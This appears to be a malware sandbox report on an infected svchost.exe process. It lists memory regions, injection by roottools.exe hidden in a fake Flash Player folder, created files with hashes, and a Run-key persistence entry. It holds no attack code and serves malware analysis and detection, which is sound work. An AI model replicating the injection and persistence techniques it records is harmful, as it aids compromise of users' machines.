Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 5A0 0x 948 0x A10 0x 918 0x 910 0x 84 0x A60 0x 98C 0x 9C4 0x C4 0x 984 0x 978 0x 95C 0x A70 0x 138 0x 708 0x AFC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
imm32.dll	0x00020000	0x0003dfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00031fff	Pagefile Backed Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000090000	0x00090000	0x00093fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000a0000	0x000a0000	0x000a0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000cbfff	Private Memory	Readable, Writable, Executable	Region Actions
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x00160000	0x0019bfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	Readable	Region Actions
windowsshell.manifest	0x00170000	0x00170fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000170000	0x00170000	0x00170fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000180000	0x00180000	0x001bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	Readable	Region Actions
index.dat	0x001e0000	0x001ebfff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000001f0000	0x001f0000	0x0022ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000230000	0x00230000	0x0026ffff	Private Memory	Readable, Writable	Region Actions
index.dat	0x00270000	0x00277fff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x00280000	0x0028ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000290000	0x00290000	0x002bffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000290000	0x00290000	0x00290fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000290000	0x00290000	0x00290fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000002a0000	0x002a0000	0x002a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000002b0000	0x002b0000	0x002b0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000002e0000	0x002e0000	0x0031ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000300000	0x00300000	0x0033ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000350000	0x00350000	0x0038ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000390000	0x00390000	0x003cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003a0000	0x003a0000	0x003dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003e0000	0x003e0000	0x0041ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000420000	0x00420000	0x0045ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000480000	0x00480000	0x004fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000510000	0x00510000	0x0054ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000550000	0x00550000	0x0058ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000005b0000	0x005b0000	0x006affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000006b0000	0x006b0000	0x00837fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000840000	0x00840000	0x009c0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000009d0000	0x009d0000	0x00dc2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000dd0000	0x00dd0000	0x00f4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000dd0000	0x00dd0000	0x00e0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000e30000	0x00e30000	0x00e6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000ed0000	0x00ed0000	0x00f4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000f50000	0x00f50000	0x00f8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000f90000	0x00f90000	0x00fcffff	Private Memory	Readable, Writable	Region Actions
svchost.exe	0x00fe0000	0x00fe7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000ff0000	0x00ff0000	0x023effff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x023f0000	0x026befff	Memory Mapped File	Readable	Region Actions
private_0x00000000026d0000	0x026d0000	0x0270ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002730000	0x02730000	0x0276ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002770000	0x02770000	0x027affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000027b0000	0x027b0000	0x027effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000027f0000	0x027f0000	0x0282ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002830000	0x02830000	0x0286ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002880000	0x02880000	0x028bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000028e0000	0x028e0000	0x0291ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002930000	0x02930000	0x0296ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002990000	0x02990000	0x029cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000029d0000	0x029d0000	0x02beffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000029d0000	0x029d0000	0x02acffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a10000	0x02a10000	0x02a4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a90000	0x02a90000	0x02acffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002bb0000	0x02bb0000	0x02beffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002bf0000	0x02bf0000	0x02ceffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002cf0000	0x02cf0000	0x02e4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002cf0000	0x02cf0000	0x02e2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002d80000	0x02d80000	0x02dbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002e40000	0x02e40000	0x02e4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002e50000	0x02e50000	0x0301ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002e50000	0x02e50000	0x02e8ffff	Private Memory	Readable, Writable	Region Actions
comctl32.dll	0x73b20000	0x73cbdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x745c0000	0x745cdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netprofm.dll	0x745d0000	0x74629fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasadhlp.dll	0x74630000	0x74635fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746f0000	0x746f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x74700000	0x7475bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74760000	0x7479efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nlaapi.dll	0x747a0000	0x747affff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sensapi.dll	0x747b0000	0x747b5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasman.dll	0x747c0000	0x747d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasapi32.dll	0x747e0000	0x74831fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
schannel.dll	0x74840000	0x74879fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74880000	0x748bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x748c0000	0x748d5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x748e0000	0x748e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rtutils.dll	0x748f0000	0x748fcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74900000	0x74916fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x74920000	0x74926fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x74930000	0x7494bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dnsapi.dll	0x74950000	0x74993fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x74cb0000	0x74cbafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x74eb0000	0x74eb4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x74ec0000	0x750bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x750c0000	0x750cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75350000	0x75444fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x75650000	0x756d2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75890000	0x758c4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x758d0000	0x759ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wintrust.dll	0x76bf0000	0x76c1cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76c40000	0x76d75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77240000	0x77245fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007ef92000	0x7ef92000	0x7ef94fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef95000	0x7ef95000	0x7ef97fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef98000	0x7ef98000	0x7ef9afff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef9b000	0x7ef9b000	0x7ef9dfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef9e000	0x7ef9e000	0x7efa0fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions
For performance reasons, the remaining 44 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0xb0000, size = 114688	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0xc76c4, size = 4	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0xc77d0, size = 4	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0xc7d38, size = 4	1	Fn Data
Create Remote Thread	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0xb95bc	1	Fn

Created Files

Filename	File Size	Hash Values	Actions
c:\users\aetadzjz\appdata\local\temp\cab4336.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\tar4337.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cab5979.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\tar597a.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cab4336.tmp	52.71 KB (53978 bytes)	MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp	52.71 KB (53978 bytes)	MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cab5979.tmp	52.71 KB (53978 bytes)	MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\tar4337.tmp	126.77 KB (129813 bytes)	MD5: 4479a52b31b6bde89384fb63854ec382 SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp	126.77 KB (129813 bytes)	MD5: 4479a52b31b6bde89384fb63854ec382 SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\tar597a.tmp	126.77 KB (129813 bytes)	MD5: 4479a52b31b6bde89384fb63854ec382 SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\sgw[1].txt	5.65 KB (5784 bytes)	MD5: 9d4f7d11a38b13abfffb23c26855ef96 SHA1: a439414520213ebc9e009ef0280efbc4c442506c SHA256: e73f65e4321a8a5af6a80097a853cd49fd7a3eedd72bfdee47a3eab0a0015663	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dw[1].txt	3.15 KB (3224 bytes)	MD5: aa11e7edd31a5aa3003171b3ce6a1e63 SHA1: 19f920fe20fb0368145fe224cbb6bc93c1c5db86 SHA256: c39527e8fc3c7154327298c32145bc51f21ab57c71297a374b89d95b46500b89	File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	Actions
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015	0.33 KB (342 bytes)	MD5: cd4e3ab8068c33a6b3aec816fe51f106 SHA1: 71c4541a08b266e8e0ba9c0c7f91742e9b5a3511 SHA256: 8740ce6d272bdc6b54ae4c2e5e4aaf9ab3d2272be470d388ba276d79c51febe2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat	64.00 KB (65536 bytes)	MD5: ee5b2511cdb5b31e4749e5955ca9a85a SHA1: 315d35255f49ceb0f944a7b847a67ec7f9ef15b5 SHA256: 87b654ae60929fec10edbdc471e9afebfac63a157ea6fceaeb4a6445690b26af	File Actions Show Properties Download
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015	0.33 KB (342 bytes)	MD5: affe9cecdbfde660607fec2b5edaaa6f SHA1: 4ef3b8e735708851cc283c0b6e3cfa2f5f46cd1e SHA256: 08acb6e6b710a96bc80c48695117802596b7aaabae08f4db40cc37eacd7299de	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat	48.00 KB (49152 bytes)	MD5: 9f1ab0535bfe55d2abb1f6e6adf846bd SHA1: 50f06d017905b347a5155f877fcf966db327dd40 SHA256: 7978882c50b68ce6e541aa765a7a98907cc56c4f1dd794a92766b2f23df85c73	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat	32.00 KB (32768 bytes)	MD5: 50d06047bd7adf336c6a8dd390506ff3 SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582 SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e	File Actions Show Properties Download

Host Behavior

File (42)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	3	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	10	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create Pipe	\device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89	open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 0	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 0	3	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 0	10	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = size, size_out = 0	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 0	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	type = size, size_out = 196608	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	size = 196608, size_out = 196608	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig	size = 720	1	Fn Data

Registry (95)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	4	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	21	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	4	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	3	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	22	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	10	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	4	Fn Data
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run	value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ	1	Fn
